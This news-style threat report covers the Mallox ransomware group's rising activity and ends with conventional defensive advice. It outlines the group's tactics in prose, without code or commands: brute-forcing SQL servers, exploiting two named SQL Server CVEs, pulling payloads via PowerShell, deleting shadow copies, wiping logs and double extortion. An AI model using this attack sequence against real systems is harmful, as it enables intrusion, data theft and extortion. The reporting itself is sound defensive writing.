The Surge of Mallox Ransomware Group: Analyzing their Increased Activity

Ransomware Group Mallox Rapidly Expanding and Poses Major Threat

Surge in Mallox Activity

A ransomware group known as Mallox, also tracked as TargetCompany, Fargo, and Tohnichi, has recently emerged as a major cyber threat. The group first appeared in June 2021 and claims to have infected numerous organizations worldwide since then. Mallox has targeted a range of sectors, including manufacturing, retail, wholesale, legal, and professional services. However, the group’s activity has experienced a significant surge in the past few months, which has led experts to believe that Mallox is on track to become an even bigger threat.

According to researchers at Palo Alto Networks’ Unit 42 threat intelligence team, Mallox-related activity has increased by a staggering 174% compared to the previous year. This surge in activity can be attributed to the group’s concerted efforts to expand its operations by recruiting affiliates. Lior Rochberger, a senior security researcher at Palo Alto Networks, suggests that Mallox’s rapid growth can be attributed to these recruitment efforts, particularly observed around May this year.

Infiltration Tactics

Mallox primarily gains initial access to enterprise networks by targeting vulnerable and insecure SQL servers. The group frequently employs brute-force attacks using a list of commonly used or default passwords for SQL servers. Furthermore, researchers have identified two remote code execution vulnerabilities that Mallox exploits in SQL: CVE-2020-0618 and CVE-2019-1068. While the primary method of infiltration is through SQL servers, there have been reports of Mallox attempting to distribute its malware through phishing emails, indicating the involvement of new affiliate groups.

Once inside the network, Mallox uses command line and PowerShell to download its ransomware payload from a remote server. The payload then disables services that could impede encryption, attempts to delete shadow copies to complicate data restoration, and clears event logs to hinder forensic analysis. Mallox follows the double extortion model, stealing data before encrypting it and operating a website where they leak data from victims who refuse to pay the ransom. Negotiations with Mallox operators are conducted through a Tor website using a unique private key for authentication.

Ransomware Threat Landscape

While the surge in Mallox’s activity is concerning, it doesn’t represent any new or additional problems for enterprise defenders. The NCC Group recently reported a 221% increase in ransomware attacks this year compared to the same period in 2022. In June 2023 alone, NCC Group identified a record-breaking 434 ransomware attacks, with the Cl0p ransomware group exploiting the MOVEit file transfer vulnerability being the primary culprit. The Lockbit 3.0 threat actor also remained active during this period.

The Importance of Proactive Defense

In light of the growing ransomware threat landscape, it is crucial for organizations to have a multilayered defense plan in place. The Unit 42 team at Palo Alto Networks recommends ensuring that all internet-facing applications are properly configured and that systems are patched and up to date. Additionally, having endpoint security controls that perform in-memory inspection can help detect process-injection attempts, lateral movement efforts, and evasion of security controls.

Editorial: The Urgent Need for Enhanced Cybersecurity

The increasing frequency and sophistication of ransomware attacks should serve as a wake-up call for organizations to prioritize cybersecurity. The surge in Mallox’s activity demonstrates the ever-evolving nature of cyber threats and the need for robust defense measures. While patching vulnerabilities and implementing endpoint security controls is essential, organizations must go beyond reactive measures. Proactive cybersecurity strategies should include regular security assessments, employee training, and the adoption of advanced threat detection and encryption technologies.

Advice for Individuals and Organizations

1. Patch and update: Regularly update all software, including operating systems and applications, to ensure that known vulnerabilities are patched.

2. Strong passwords: Use unique and strong passwords for all accounts, especially those related to sensitive information or systems.

3. Multi-factor authentication (MFA): Enable MFA for all accounts whenever possible to add an extra layer of protection.

4. Training and awareness: Educate employees about phishing scams, social engineering tactics, and safe online practices to minimize the risk of successful attacks.

5. Backup regularly: Create and maintain secure backups of critical data to mitigate the impact of ransomware attacks.

6. Vulnerability management: Implement a comprehensive vulnerability management program to identify and address security flaws in a proactive manner.

7. Incident response plan: Develop and test an incident response plan to minimize the impact of a potential security breach.

By following these proactive measures, individuals and organizations can enhance their cybersecurity posture and better protect themselves against the growing ransomware threat.